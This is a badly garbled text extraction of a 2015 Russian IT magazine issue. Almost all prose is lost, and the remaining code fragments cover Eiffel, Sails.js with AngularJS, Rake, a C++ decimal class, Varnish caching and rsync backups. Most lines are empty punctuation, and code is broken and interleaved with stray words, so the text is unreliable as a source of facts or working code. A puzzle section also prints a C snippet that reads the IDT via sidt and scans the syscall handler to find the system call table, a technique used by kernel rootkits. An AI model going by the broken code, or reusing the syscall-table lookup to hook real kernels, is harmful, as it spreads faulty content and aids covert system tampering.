(Interactive Software Engineering), , (1993 ) Eiffel Software.
500 -
. ,
. ,
. / : Python

open source ; C/C++


, , , AT&T (Bell Labs),
( ); Pascal,
Lua ... , , Objective-C,
NeXT, , , Apple.
Eiffel ,
: , - Eiffel Sofware
Boeing, Rosenberg EMC.
( Eiffel Software, ) , ,
C
; .
, Eiffel. , open
source Visual Eiffel,
2007 . ,
EiffelStudio.

travellight@shutterstock.com

yurembo ,

yazevsoft@gmail.com

01 /192/ 2015

Windows,
. Mac OS UNIX.
, . ? Java? Mono? . Eiffel. .

91

92

, , . ,
,
, ,
: Pascal, Ada, Oberon. ! . ,
,
, , Hello, World. Eiffel ,
. . (
) , -. , (client), -
(supplier), ,
. , ,
, , , .
,
, , ,
, ,
. . ,
EiffelStudio . ,
. .
.
. ,
()
: .
EiffelStudio
AutoTest.
,

01 /192/ 2015

1999 ,
. .
.
, , . AutoTest
, , , .
. Eiffel,
. car nullptr,
( ) car->drive();. ,
car nullptr .
, ,
. Void
Safety.

, C/C++, C# Java,
, .
, ,
- , .
Eiffel ! SCOOP (Simple Concurrent
Object-Oriented Programming) Eiffel
, .
, EiffelStudio
. , ( UML-),
, Eiffel-, -

01 /192/ 2015

93

, , ,
.


Eiffel, . 12 ,
, . EiffelBase, . ,
, Eiffel: . EiffelVision 2 -
, , -
: Windows, UNIX, Linux, VMS .
Windows.
WEL (Windows Eiffel Library) Win32 API ( ) , : , ,
, Win-,
. EiffelCOM , Microsoft (
). - EiffelNet
. EiffelTime . EiffelStore
ODBC, :
Oracle, SQL, Ingres, Sysbase. EiffelThread ,
Windows NT, UNIX
x86/64, SGI Cray. Eiffel2Java

, Eiffel, Java-, , .
EiffelWeb Eiffel
HTML-, , CGI. EiffelLex EiffelParse
.

, .
,
! , Eiffel Software, ,
Open Source.

EIFFELSTUDIO
EiffelStudio Eiffel. : EiffelStudio Enterprise Evolution Edition
GPL.
,
.
EiffelStudio . ...
EiffelStudio Xcode
, , .
Apple Downloads for Apple Developers (https://
developer.apple.com/downloads/index.action,
, Apple ID), , , Command Line Tools (OS X 10.9) for
Xcode,
Late December 2014.
.
.
,
Xcode, ; ,
EiffelStudio.

94


X11. ,
XQuartz, Apple. :
Eiffel IDE,
XTerm, . XQuartz xquartz.macosforge.org.
. 2.7.7.
MacPorts, UNIX- OS X.
EiffelStudio. MacPorts,
: https://distfiles.
macports.org/MacPorts/MacPorts-2.3.1-10.9-Mavericks.pkg.
,
- . .
, Eiffel. XTerm : sudo port install
eiffelstudio. ,
.
,
, .
,
, . ,
XTerm bash ( ),
. ,
XTerm, , : cat >> ~/.bash_prole. :

01 /192/ 2015

note
description : "consoleproject1 application
root class"
date
: "$Date$"
revision
: "$Revision$"

export ISE_PLATFORM=macosx-x86-64
export ISE_EIFFEL=/Applications/MacPorts/Eiffel_13.11
export GOBO=$ISE_EIFFEL/library/gobo/svn
export PATH=$PATH:$ISE_EIFFEL/studio/spec/
$ISE_PLATFORM/bin:$GOBO/../spec/$ISE_PLATFORM/bin

class

, , <Ctrl
+ D> . ,
bash, : source
~/.bash_prole.
, !
EiffelStudio, estudio.
, , ! , ,
. - .

feature {NONE} -- Initialization

APPLICATION
inherit

ARGUMENTS
create

make

EIFFELSTUDIO
, EiffelStudio .
,
.
.
.
, . Basic
application (no graphics library included) , Graphics application, multiplatform, with EiffelVision 2 , .
,
Create.
, . EiffelStudio
, , Compile Project,
OK. ,
.
, OK, EiffelStudio
. Eiffel- (
Groups APPLICATION). :

make
-- Run application.
do
--| Add your code here
print ("Hello Eiffel World!%N")
end
end
. .
note , , ,
. class . Eiffel
, inherit . create
, , ,
. feature .
( NONE)
. , NONE private
C++, .
: ANY public ( ) CHILD protected (
, ).

( inherit). feature
make (). do,
end. , Eiffel ,
.
print, .
(--).
, , Project

01 /192/ 2015

95

Finalize. , C- .
,
Hello Eiffel World!.
*.e.

EiffelStudio Application
Wizard

,
. (,
application.e) input.rtf (OS
txt) .
feature :

input_le: PLAIN_TEXT_FILE
output_le: PLAIN_TEXT_FILE
:
, var. PLAIN_TEXT_FILE
, ASCII-.

, :

, EiffelVision, EV_APPLICATION.
, ,
(
GTK),
.
EV_APPLICATION , EV_TIMEOUT ( ) ; , EV_COLOR
. first_window MAIN_WINDOW.
make_and_launch default_create, EV_
APPLICATION, prepare ( MAIN_WINDOW), ,
launch ,
.

create input_le.make_open_read ("input.rtf")


create output_le.make_open_write ("output.rtf")
. Eiffel : .
(, ).
. Eiffel ,
:

from
input_le.read_character
until
input_le.exhausted
loop
output_le.put (input_le.last_character)
input_le.read_character
end
from .
read_character last_
character input_file
. until . , exhausted ,
, (
), , loop.

.
close :

input_le.close
output_le.close
, .
, ,
, .


EiffelStudio Graphic application,
multi-platform, with EiffelVision 2. , ,
, :
, .
, ,
.

Eiffel
(C-) : ,
, , ; ,
; , , ;
.
, .
,
(. . - , ).
,
Eiffel. ,
! ,
. , , .
,
, . Eiffel
, Eiffel_Examples : -.
Eiffel ,
Delphi, C#, Ruby . , ,
, .
, C
,
, , C
,
.

01 /192/ 2015

Kostyantyn Ivanyshen@shutterstock.com

96


aka Spider_NET
iantonov.me
iantonov.me

:

JavaScript.
, ,
JS-

. (
,
),
.
Sails.js,

Node.js , .

SAILS.JS MVC-

ode.js ,
, ,

JavaScript .
RoR, Yii ASP .NET MVC. JavaScript
,
.
-,
,
Sails.js.


Sails.js Derby,
Meteor, Rendr, Geddy Tower. ,
Derby. ,

.

INFO


RoR, Sails.js

.
Derby
,
.

01 /192/ 2015


Derby,
, GitHub Sails.
js. ,

RoR , . ,

( . . . .
) Sails.js
,
,

.

SAILS.JS

97

1.
LAYOUT.EJS
<!doctype html>
<html>
<head>
<meta charset="utf-8">
<title><%- title %></title>
<link rel="stylesheet"
href="/styles/style.css">
</head>
<body ng-app="todoapp">
<%- body %>
</body>
<script src="//cdnjs.cloudare.com/ajax/
libs data-main="/js/main.js">
</html>

Sails.js
. , ,
RESTful API Sails.js
. ,
API
(CRUD,
, ) .
,

. ,

Sails.js.
Sails.
js ,
(sailsjs.org).

,
.

, Sails.js
MVC-.

(RoR, Yii, CodeIgniter, ASP .NET MVC)
Sails.js
,
,
. MVC : models, views, controllers
JavaScript- .
Sails.js
-, .
.
, socket.io. , Sails.

js- . backend Sails.js,
! frontend AngularJS.
Node.js,
, .

RequireJS.
,

.
.
!
? !
,

. ?

? , .
window.name = 'NG_DEFER_BOOTSTRAP!';
. Node.
.
js, NPM Sails.js. Sails.js require.cong({

'baseUrl': '/js',
, UNIX-like (Linux,
'paths': {
OS X, BSD). Windows
/.
'angular': '//ajax.googleapis.com/ajax/

libs/angularjs/1.2.16/angular'
,
, },
'shim': {
.
.
'angular': {

,
'exports': 'angular'
Linux-,
Sails.js }
,
}

.
DigitalOcean. DO });
Sails.js
ORM
require([
Ubuntu Node.js, Waterline. ,
'angular',


'app'
.
], function (angular, app) {
. .
angular.element(document.getElementsByTagName

('html')[0]);
,
angular.element().ready(function() {

: MySQL, PostgreSQL, Redis,
angular.resumeBootstrap([app.name]);
Sails.js MongoDB, });
sudo npm -g install sails.

});
.


,
.

2.

REQUIREJS

98

01 /192/ 2015

3.
ANGULAR
dene(function(require){
var angular = require('angular'),
Controllers = angular.
module('controllers', []);
Controllers.
controller('TodoCtrl',
require('controllers/TodoCtrl'));
return Controllers;
})
Sails.js

, : goo.gl/lVjEYG.
BitBucket, . ,
.
, : sails new
todo.
. .
,
MVC ,
;), assets.
,
. CSS/HTML/
JS/ .
, sails lift
( 1337). ,
.

REQUIREJS

CDN, .
, CDN ,
Angular
Require. ,
.
RequireJS.
,
, . RJS . :

.
OK, RJS. ,
.
-. Sails.js
, Layout (). (
- ASP .NET MVC) , .
Sails.js - , EJS.
, -

01 /192/ 2015


.
views/layout.
ejs,

1.
, <%-%>.
. title body.
body
require.
js CDN CloudFlare.

data-main script.
(main.js),
.
AngularJS-,

body. ng-app. AngularJS
,

(

. . .).

REQUIREJS

99

4.

TODOAPP

dene([
'angular',
'controllers'
], function (angular) {
app = angular.module('todoapp',
['controllers']);
return app;
});

.
(

),
.


: sails generate controller
welcome.

WelcomeController.js api/
controllers.
module.
exports:

index: function(req, res) {


res.view('welcome', {
title: " !!"
});
}

5.

TASK

attributes: {
"title": {
"type": "string",
"required": true
},
"completed": {
"type": "boolean",
"defaultsTo": false
}

main.js assets/js.
,

,
AngularJS.
2.
CDN,
path. shim ( ),
AMD- ( ) .
AngularJS, .

6.


, Angular.
, , (
angular.module) require , RequireJS.
controllers.js assets/js
RJS- 3 (, , ,
:). . .).
Angular angular.module.
.
TodoCtrl,
assets/js/controllers. . - . !
AngularJS RJS- ( app.js assets/js), todoapp .
4.


, . ,

Sails.js
(index).


welcome (. view).
view ,
.
title,
.
, .
routing.js config

TODOCTRL

$scope.todos = [];
$http.get('/task/nd').success(function(data) {
for (var i = 0; i < data.length; i++) {
data[i].index = i;
}
$scope.todos = data;
});
//
$scope.addTodo = function() {
if (!$scope.newTodo.length) {
return;
}
$http.get('/task/create?title=' + $scope.newTodo).
success(function(data) {
$scope.todos.push({
title: $scope.newTodo,
completed: false
});
$scope.newTodo = '';
});
};

100

01 /192/ 2015

Welcome

API

, API CRUD.
API .
: title (string) completed (boolean). ,
, ( ).
.
. (email, url, post code
).
, API.
:

your_host:1337/task/create?title=cc&completed=false
your_host:1337/task/create?title=cc2&completed=false

'/': {
controller: 'WelcomeController',
action: 'index'
}
"/",
. welcome.ejs
views .

,
.
(sails lift).

, API
,
,
API. task .
sails generate api task. -

01 /192/ 2015

101

JSON-. , , .
,
.
,
:

your_host:1337/task/nd


,

,
API. . , . todoList.ejs views
.

AngularJS. :
xakep.ru/anglurjs/ ( , .
. .). .
todos.
, c (, , ).
assets/js/
controllers/TodoCtrl.js. 6. , . $http API.
,
find.

JSON. Get ,
.
. $scope.
.
addTodo(),
, .
.

Get. , Post.

.
(, ) , $http. ,
put, delete.

, .


. !
, !

.

, .



.
,
. , .
Sails.js
, . , -
JavaScript. !

CoffeeScript -: , .
. CS,
Sails.js.
:
coffee-script: npm install coffee-script --save
(app.js) :
require('coffee-script/register');
API (, )
--coffee. , sails generate api mymodel - coffee.

Sails.js ( )
. , , .
.
goo.gl/YZaSX5
Sails.js.

Sails.js.
goo.gl/iQq7Ik Sails.js
+ Reactive.js + Backbone.js.

-.
goo.gl/AlKm99 Passport
Sails.js. Sails.js, .
goo.gl/D9Zv4n Sails.js.
goo.gl/BttFnr ,
Sails.js. .
goo.gl/2PZh2r ORM Waterline.
https://bitbucket.org/iantonov/todo/
.
goo.gl/tLpBOZ AngularJS.

102


ovchinnikov.cc


RAKE

01 /192/ 2015



.
IDE .
:

, - ,
,
.
Continuous Integration , ,
- (
- ).

batch- shell-,
-
.

, ,
.
,
, .
, ,
XML, , , ,
.

, , XML
. ,
(,
/ - ),
, (
, ,

), , , , , . ,
, ?

. Rake -
Ruby on Rails Ruby-,
, .NET, .
Rake , Ruby. , .
, Make, Ant MSBuild, .
Rake:

01 /192/ 2015

103

DSL Ruby
XML ;
;
;
,
;
.

Rake Ruby.
, 1.9, , . Ruby 1.8

Rake, ,
RubyGems,

gem install rake

Rake
Rakefile.
(tasks). , , .

task name: [:prereq1, :prereq2]


, Ruby (block).

task name: [:prereq1, :prereq2] do |t|


# actions
end

RAKE

Thor
Thor (whatisthor.com) (Yehuda Katz)
Ruby. Ruby-
Rake, , ,
Ruby, Rake DSL . ,
.

Grunt
Grunt (gruntjs.com) - JavaScript, a . -.

Paver

Rake :
.
, . task.

( , ). ,
(). file.
, , Rake.

Python Ruby, Rake


Paver (paver.github.io/paver/). Rake
, Python , .

rake task_name

Java
, Ant Maven, XML-. Gradle (www.gradle.org)
Groovy DSL.

Rake , Rakefile default.


, rake .

Gradle

>rake
rake aborted!
Don't know how to build task 'default'
rake-.

Rake Ruby-
#,
desc.
, rake -T,
. , -


rake -T

Rake (namespaces)
. , , Ruby on Rails, rake db:migrate,
db , migrate , . namespace.

namespace :namespace_name do
# tasks
end

RAKE-
Rake Rakefile.
, -

104

01 /192/ 2015

desc "Clean the artefacts from previous build"


task :clean do
rm Dir.glob('*.exe')
rm_rf(out_dir) if Dir.exists?(out_dir)
end
desc "Compile project with MSBuild"
task :build do
mkdir_p(out_dir) if !Dir.exists?(out_dir)
project = "#{proj_root}/hello.proj"
cmd = "\"#{msbuild}\" #{project}"
sh cmd do |ok, res|
raise "*** BUILD FAILED! ***" if !ok
end
end
desc "Prepare deploy package"
task :pkg do
artefacts = ["#{proj_root}/hello.exe",
"#{proj_root}/readme.txt"]
cp_r(artefacts, out_dir)
end
. : rakelib,
rake. , rake-, Rakefile.


Rake-

:
(Clean) .
exe- out.
(Build) , . MSBuild
proj- .
(Package) exe out,
Read Me.

.NET- RAKE

, Rake
Ruby/Rails-.
. Hello world C#. Rake
.NET- ,
/
/ , XML NAnt MSBuild
.

,
MSBuild. , ,
.

default , , ,
rake ,
clean, build package. ,
Rakefile, Ruby-, require , .

using System;
public class HelloWorld
{
static void Main()
{
char hello="hello";
Console.WriteLine(hello);
Console.ReadLine();
}
}

WWW
Rake
GitHub:
https://github.com/
jimweirich/rake
Rake:
docs.seattlerb.org/rake/

Albacore:
https://github.com/
Albacore/albacore

, Rake
.NET-.
Albacore, DSL Rake
,
Microsoft.

gem install albacore


,
Albacore:

require "albacore"
desc "Compile project with MSBuild using Albacore"
build :alba_build do |b|
b.le = "#{proj_root}/hello.proj"
end

<Project xmlns="http://schemas.microsoft.com/
developer/msbuild/2003">
<ItemGroup>
<Compile Include="hello.cs" />
</ItemGroup>
<Target Name="Build">
<Csc Sources="@(Compile)"/>
</Target>
</Project>

, .
Albacore
Wiki GitHub.

Rake- , , .

require "leutils"
task :default => [:clean, :build, :pkg]
msbuild = "#{ENV['WINDIR']}\\Microsoft.NET\\Frame
work\\v3.5\\msbuild.exe"
proj_root = File.dirname(__FILE__)
out_dir = "#{proj_root}/out"

ALBACORE

DVD.XAKEP.RU

.

Rake , .
Ruby ,
.NET-.
, Ruby
. ,
legacy-, ,
( , COM- ) .

420 !
: ?
-, . .
-, .
, . -, (,
): , .

http://shop.glc.ru

6 ( 5%) 2394 .
12 ( 15%) 4284 .

106

01 /192/ 2015

PARALLELS

( ,
). IT-
.
( ,
, ). Parallels
, !

1

lozovsky@glc.ru

, ,
Linux .
,
.

int what_sz = 3;
char what[] = "\xff\x14\x85";
void *
abcdefh(void)
{
void *tmp;
uint8_t **ptr;
struct idtr idtr;

PARALLELS
1
. ,
,
( 1/4 ),
( 1). , , (
2). .

struct idt *idt;


__asm__("sidt %0" : "=m" (idtr));
idt = (struct idt *) (idtr.base +
(0x80 * 8));
tmp = (void *)((idt->off2 << 16) |
idt->off1);
ptr = memmem(tmp, 0x100,
what, what_sz);
if (ptr == NULL)
return NULL;
ptr += 3;
return *ptr;
}

: .
( , ).
1. . , , ,
. .
.
2. . ,
, , .
,

.
() , .

: , Hello, fork() . .
, libc / ,
.
,
,
.
HelloHello.

4
. ,

107

01 /192/ 2015

00 00 00 00 00 00 00 00 00 04 00 00 00 65 01 00 00 00
03 00 00 00 65 01 00 00 00 04 00 00 00 66 01 00 00 00
67 01 00 00 00

, .
: ?

HEX View:

04
09
69
69
68
00

00
00
6C
6E
01
02

00
46
65
65
00
00

TEXT View:

......Hello World!..ConcatenatedStringExample..First
string part..Second string part.........
(.............................................e.......
e........f....g....

00 0C 00 54 65 73 74 46 69 6C 65 4E 61 6D 65
69 72 73 74 4C 69 6E 65 0E 00 54 65 73 74 46
48 61 6E 64 6C 65 0A 00 53 65 63 6F 6E 64 4C
01 00 00 00 09 03 00 00 00 00 00 05 00 00 00
00 00 69 01 00 00 00 01 00 00 00 6B 01 00 00
00 00 6B 01 00 00 00 04 00 00 00 6A 01 00 00 00


HEX View:

07
00
6E
66
00
00
00
00
00
00
00

TEXT View:

......TestFileName..FirstLine..TestFileHandle..SecondLine
...............h....i........k........k........j....

HEX View:

04
19
6E
74
20
00
00

00
00
67
72
73
00
00

IT-

00
43
45
69
74
00
00

00 0C 00 48 65 6C 6C 6F 20 57 6F 72 6C 64 21
6F 6E 63 61 74 65 6E 61 74 65 64 53 74 72 69
78 61 6D 70 6C 65 11 00 46 69 72 73 74 20 73
6E 67 20 70 61 72 74 12 00 53 65 63 6F 6E 64
72 69 6E 67 20 70 61 72 74 01 00 00 00 05 02
28 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

00
61
73
6F
05
00
00
65
65
00
00

00
73
20
6D
05
00
00
02
02
02

0B
70
04
20
00
00
00
00
00
00

00
65
00
02
00
00
00
00
00
00

44
72
74
00
00
00
00
00
00
00

72
73
68
48
22
00
08
06
01
6C

65
6B
65
46
00
00
00
00
00
01

61
79
20
02
00
00
00
00
00
00

6D
0A
04
00
00
00
00
00
00
00

77
00
00
00
00
00
65
65
68
00

6F
47
54
00
00
00
02
02
02
02

72
72
65
09
00
00
00
00
00
00

6C
65
6D
07
00
00
00
00
00
00

64
65
70
00
00
00
00
00
00
00

21
74
05
00
00
00
03
04
69
6A

09
69
00
00
00
00
00
00
01
01

TEXT View:

......Dreamworld!..Kaspersky..Greetings ..the ..Temp


..from ..HF................".......................
................e........e........e........e........h..
..i........l........j....

- ,
, . lozovsky@glc.ru
. , , . , , , .

. ,
fork()
,
,
.
.
,
, .
:
fork()
pid. ,
-

00
4B
67
72
00
00
00
00
00
00
00

.
,
.

, ,
.

5
. 32 ,
. ,
16 ,
'a'.
, ,
RISC ,

, .
4 , 8.
. 64
8 , 32 .
MSVC
GCC, 64
, 32.

6
, , , "seq_lock".

7
: 24.

++

108

01 /192/ 2015

qua ,
qualab@gmail.com

,
!

109

, , !

01 /192/ 2015

. ,

.

3,4999990123 3,5
, ,

,
.
,

,

.


,
. ,

,
. , real Pascal ,
,
.
, , , .
,
N ( , N = 2), (
). :

,
, . , , , ,
, . , ,
,
, .

, , . , ,
, .
, , -,
, , ,
, . .


, ,
IEEE 754.
single-precision ( )
double-precision ( ) floating-point ( ).
:
32 , , , 64 .
2, , :

x = m * 2e,

1 <= |m| < 2; m, e

x = m * Ne,
:
m e , .
, , 1 <= |m|
< N, ,
, ,
.

, , , . ,
N (
, N = 2),

23

11

52

, IEEE 7542008
, . C/
C++, float double, long double,
Microsoft,
Visual C++ double.
, ,
.
, , float double.

110

++

0,
1 .
, ,
, ,
.

, , 1,

, .

.
, , : 223 + 1 =
= 16 777 216; ,


. ,
, ,
123 456,78 , -,
, . ,
1 234 567 890,
32- ,
! , , C++
double.
15 : 252+1 = 9 007 199 254 740 992
32- ,
64- (19 ), , , . ,
.
. ,
2,
.
,
,
( biased exponent ).

, 127, 1023.
,
. !

01 /192/ 2015


, . 640 (= 512 + 128)
:
0;
, 512 , , 640/512 = 512/512 + 128/512
1 + 1/4, 1,01, ,
0100000 00000000 00000000;
1 + 1/4 640, , 9,
29 = 512, , , ,
127, 127 + 9 = 128 + 8, : 10001000.
,
, 1023 + 9 = 1024 + 8,
: 100 00001000. ,
, .
: :
(INF ), , -- (NaN not-anumber).

,
, 1, ,
,

: ,
.
, /++ .
, ,
.
10308,
1038.
1019, 64- , ,
- ,
.
. 23
8- . , 15 , , ,
6 , , 9 . ,
.
,
, ,
.

111

, , !

01 /192/ 2015


,
,

!
, . -, ,
C/C++, C# Python,
Decimal,

.
, C++,

, ? ,
: ,
, Decimal .


.
,
, , 64 .
,

18
.
64- . ,


.
, 18 ,

.

!
. , , n f,

x = n + f * 1018,

n, f


,
: , ,
,

, , .

. -,

, .


,
. :

x = a + b * 1018,
y = c + d * 1018,
z = x + y = e + f * 1018,
a, c, e: int64_t;
b, d ,f: uint64_t;
0 <= b, d, f < 1018,
z = (a + b * 1018) + (c + d * 1018)
e = a + c + [b * 1018 + d * 1018]
f = {b * 1018 + d * 1018} * 1018

, 0 <= f < 1018.

64- , , .

class decimal
{
...
private:
int64_t m_integral;
uint64_t m_fractional;
};
, , ,
1018 : f = (x n) * 1018.
, ,
1,67 : n = 2 f = 0,33 * 1018. ,
.

[n] ,
{n} . ,
. 1018 64- uint64_t (

112

++

), , , :

e = a + c + (b + d) div 1018,
f = (b + d) mod 1018.
, a c. ,
, b d 1018, , (b + d) < 2 * 1018, ,
,
:

e = a + c;
f = b + d;
if (f >= 1018) f -= 1018, ++e;
e .
- ,
. .

e = a - c;
if (b >= d) f = b - d;
else f = (1018 - d) + b, --e;
. .


.
, , 1018, Q-,
, 109.
1018 , , 64- ,
C++.
? , :

a = sa * a1 - a2 * 10-9; b = b1 - b2 * 10-9;
c = sc * c1 - c2 * 10-9; d = d1 - d2 * 10-9;
0 <= a2, b2, c1,2, c1,2 < 109;
sa,c = sign(a), sign(c)
0 <= a1, 1 < MAX_INT64 / 109
:

U = (a1, a2, b1, b2),


V = (c1, c2, d1, d2)T,
A = V * U,
| a1*c1 a1*c1 b1*c1
A = | a1*c2 a1*c2 b1*c2
| a1*d1 a1*d1 b1*d1
| a1*d2 a1*d2 b1*d2

b2*c1
b2*c2
b2*d1
b2*d2

|
|
|
|

,
. A11 = a1 * c1 MAX_INT64 / 1018, : A12 = a1 * c2 A21 = a2 * c1
MAX_INT64 / 109. ,
:

e = A11*1018 + (A12+A21)*109 + (A13+A22+A31) + (A14+A23+A32+A41) div 1018,


f = (A14+A23+A32+A41) mod 1018 + (A24+A33+A42) + (A34+A43) div 109

01 /192/ 2015

A44 div 1018 ,


.
, ,
MAX_INT64. ,
uint64_t
. ,
,

se = sa xor sc :
, . ,
, ,
. ,

C++.



,
.

x1
x1.
,

y = x1 = 1/(a + b * 1018)
= c + d * 1018

x.
x (
),
.
a = 0, :
y = 1 / (b * 1018) = 1018 / b,
e = 1018 div b,
f = 1018 mod b;
b = 0, a = 1, y = e = 1, f = 0;
ec b = 0, a > 1, :
y = 1 / a,
e = 0, f = 1018 div a.
, x
,
:
a > 1, b != 0, :
y = 1 / (a + b * 1018) < 1,
e = 0,
f = 1018 / (a + b * 1018).
10,
a, :

k = max(k): 10k <= a,


u = 1018, v = (a * 1018-k + b div 10k);
f = (u / v) * 1018-k,
for (++k; k <=18; ++k)
{
u = (u % v) * 10;
if (!u) break; //
f += u / v * 1018-k;
}

01 /192/ 2015

113

, , !


,
.
0 18 , , .


, float
double decimal.

decimal::decimal(double value)
: m_integral(static_cast<int64_t>(std::oor(value))
m_fractional(static_cast<int64_t>(std::oor(
(value - m_integral) * 1018 + 0.5))
{
normalize();
}
void decimal::normalize()
{
uint64_t tail = m_fractional % 103;
if (tail)
{
if (tail > 103/2)
m_fractional += 103 - tail;
else
m_fractional -= tail;
GITHUB
}
}

103 , ,
, double
decimal,
.

, 1018-15
.
, .
double
decimal. ,
, double
int64_t,
decimal
.
float , :
1018-7 = 1011.
decimal , m_integral.
m_integral, m_
fractional.
decimal double float :

return m_integral + m_fractional * 10-18;


.
, , ,
decimal separator ,
. m_precision
.
, . ,
, , ,
, .

, decimal, .

, !
, C/C++ . ,

Python C#, 1518
, .
decimal , int64_t. ,
double float

, .
,
decimal .
, .

, .
double float,
, . , , ,
, .
, !

Unixoid

114

01 /192/ 2015

Syaheir Azizan@shutterstock.com

urban.prankster

martin@synack.ru


VARNISH

01 /192/ 2015

115


,
-. ,
,
nginx/lighttpd
-. Squid, ,
. Varnish.

Varnish (varnish-cache.org) (reverse) - HTTP.

. ,
,
; , -
. . Varnish
Verdens

Gang. 1.0 2006 , 2014-


4.0.
BSD- , .

,
FreeBSD - (Poul-Henning Kamp) , ( Squid) . , Varnish ,
(Squid
SMP
3.2).
POSIX, . , Varnish

116

Unixoid

Windows.
.
4.0
,
. Varnish ESI (Edge Side Includes),
-
. . Varnish .
(, ) . , ,
. Varnish ,
, .
Squid,
, Varnish HTTP
.
(FTP, SMTP
),
- (Varnish
). , .
Varnish Configuration
Language (VCL) ,
.
(
),

. . VCL
,

,
,
. ( , ),

(rewrite) . , -

01 /192/ 2015

HTTP- , . (round
robin, random DNS, Client IP).
, VMOD (Varnish MODules).
, .
(varnish-cache.org/vmods) ,
.

Varnish

-,
Facebook, Twitter, Vimeo Tumblr.

VARNISH
Varnish
x64- Linux, FreeBSD Solaris.
( EPEL Ubuntu
Universe) Linux *BSD.
Red Hat, Debian, Ubuntu FreeBSD. , .
Windows ( Cygwin),
*nix- . Varnish
3.x 4.x, , 3.x
2015 . , ,
(, 3- , 2011-,
),
. Varnish - .
, - (nginx, lighttpd),
. Varnish HTTP-, . Varnish
.
Varnish Ubuntu 14.04 LTS Apache.
.
/etc/default/
varnish

$ sudo apt-get install apt-transport-https curl


$ sudo curl https://repo.varnish-cache.org/
ubuntu/GPG-key.txt | apt-key add $ sudo echo "deb https://repo.varnis
cache.org/ubuntu/ trusty varnish-4.0"
>> /etc/apt/sources.list.d/varnis
cache.list
$ sudo apt-get update
$ sudo apt-get install varnish
, , .
Varnish - . .
/etc/
default/varnish. .
, :
minimal, c VCL advanced.
.

6081, localhost:6082,
VCL. 256 . , Varnish 80-
, HTTP-, .
advanced,
.

$ sudo nano /etc/default/varnish


#
varnishd

01 /192/ 2015

117

START=yes
#
( ulimit -n)
NFILES=131072
#

(for ulimit -l)





#


MEMLOCK=86000
#



.




-n
INSTANCE=$(uname -n)
#


,
IP
# VARNISH_LISTEN_ADDRESS= ,



VARNISH_LISTEN_PORT=80
# - IP
VARNISH_ADMIN_LISTEN_ADDRESS=127.0.0.1
VARNISH_ADMIN_LISTEN_PORT=6082
# VCL-
VARNISH_VCL_CONF=/etc/varnish/default.
vcl DAEMON_OPTS="\
-a ${VARNISH_LISTEN_
ADDRESS}:${VARNISH_LISTEN_PORT} \
-f ${VARNISH_VCL_CONF} \
-T ${VARNISH_ADMIN_LISTEN_
ADDRESS}:
${VARNISH_ADMIN_LISTEN_PORT} \
. .
Apache, 8080- . ,
:

$ sudo nano /etc/apache2/ports.conf


NameVirtualHost *:8080
Listen 8080
Varnish, HTTP. /etc/default/varnish
-b (-b localhost:8080), VCL-, VARNISH_VCL_
CONF ( example.vcl). , :

$ sudo nano /etc/varnish/default.vcl


backend apache {
.host = "127.0.0.1";
.port = "8080";
}
. Varnish:

$ sudo service varnish start


netstat, -.


, , , Varnish
, . VCL, . ,
, , , . VCL ,
, : , , . ,
. , Varnish Book
(varnish-software.com/static/book). -

default.vcl

(github.com/mattiasgeniar/
varnish-3.0-configuration-templates)
, . VCL.
Varnish
HTTP- (). :

backend server1 {
.host = "10.0.0.11";
}
backend server2 {
.host = "10.0.0.12";
}
,
.
, Varnish
director:

director balanced_servers round-robin {


{
.backend = server1;
}
{
.backend = server2;
}
}
round-robin random.
. VCL-.
default.vcl

118

Unixoid

01 /192/ 2015

sub vcl_recv {
set req.backend = apache
if (req.url ~
"\.(css|js|png|gif|jp(e)?g)")
{
unset req.http.cookie;
}
return (lookup);
if (req.url ~ "^/(cron|install)\.
php$" && !client.ip ~
local)
{
error 404 "Page not found.";
}
if (req.url ~ "^/update\.php$"
return (pass);
}
}

().
,
.
- ,
-,
(
, ).
.
VCL Basics
(varnish-software.com/static/book/VCL_Basics.
html),
(varnish-cache.org/docs).
ACL
URL
.
, .

acl local {
"localhost";
"192.168.1.0"/24;
! "192.168.1.10";
}
,
!, 192.168.1.10
. (client.ip ~ local).
vcl_recv
. , cookie, ,
.
Varnish
cookie. ,
cookie.
cron.php install.php
, , Varnish,
update.php .


varnishadm

, , , . req.http.User-Agent, / . : varnish-cache.org/
docs/trunk/users-guide/devicedetection.html.
return vcl_recv : lookup , pass
. , ,
,
.
, ,
.
, : deliver, fetch, hash,
pipe, error, restart, retry. vcl_hash
, . URL IP/ .
, , ,
. ,
ookie.
vcl_error , -.
. vcl_fetch, vcl_pass vcl_miss. 4.0
vcl_backend_fetch vcl_
backend_response, .
cookie
, .

sub vcl_backend_response {
if (bereq.url ~ "\.(png|gif|jpg)$") {
unset beresp.http.set-cookie;
set beresp.ttl = 1h;
}
}
vcl_deliver. , .
.
Varnish:

sub vcl_deliver {
remove resp.http.X-Varnish;
remove resp.http.X-Powered-By;
}
, , ,
.

VARNISH
Varnish . , -

01 /192/ 2015

119

varnish*. Appendix A:
Varnish Programs Varnish Book.
varnishadm. , ,
. . :

Varnish
Administration Console

.
,
Varnish Plus.
. , Varnish,
Collectd, Nagios, Cacti . varnishcache.org/utilities.


Varnish Collectd

$ sudo varnishadm
Varnish CLI. , help.
(23),
. ,
help . , vcl.* -. :

varnish> vcl.list
param.show param.set , panic.show panic.
clear , ban ban.list , .
varnishtop varnishhist ,
(URL, , ).
top, .
, . , URL :

$ varnishtop -i RxUrl
$ varnishtop -i RxHeader
, (varnishstat)
(varnishlog varnishncsa).
varnishtest
Varnish. ,
, - Varnish
Administration Console (varnish-software.com/resources/vacdemo) , -

Varnish , .
.
.
.

Unixoid

01 /192/ 2015

,


LINUX
? *nix- ,
-. ,
... ?


rommanio@yandex.ru

agsandrew@shutterstock.com

120

01 /192/ 2015

121

( ), , :
, ( ) ? ,
. , , :
.
, , Cron *nix-
.
,
.
.

,
, , .

( ) .
, ,
.
. ,
, , , .
.
, , , .

- .


.
.

RSYNC RSNAPSHOT
rsync
(
/ ),

. :
SSH ( );
,
, ;

rsync

;

, .

INFO

,

.
,

, ,

,

.

$ rsync --progress -e ssh -avz /home/adminuser/


Docs root@leopard:/home/adminuser/backup/

:
-r ;
-l ;
-p (, UGO, ACL
-A -X );
-t mtime;
-o ( ,
, root);
-g ;
-D ;
-a , ( ACL
);
-v ;
-z ;
-e ssh ,
. , SSH , -e 'ssh -p3222';
--progress .

,

,
, .
.
,
( /
) . --fake-super,

( ). ,
rsync , .
ID --numeric-ids.
:

rsnapshot

122

Unixoid

01 /192/ 2015

list-current-files), - ,

restore --fileto-restore. :

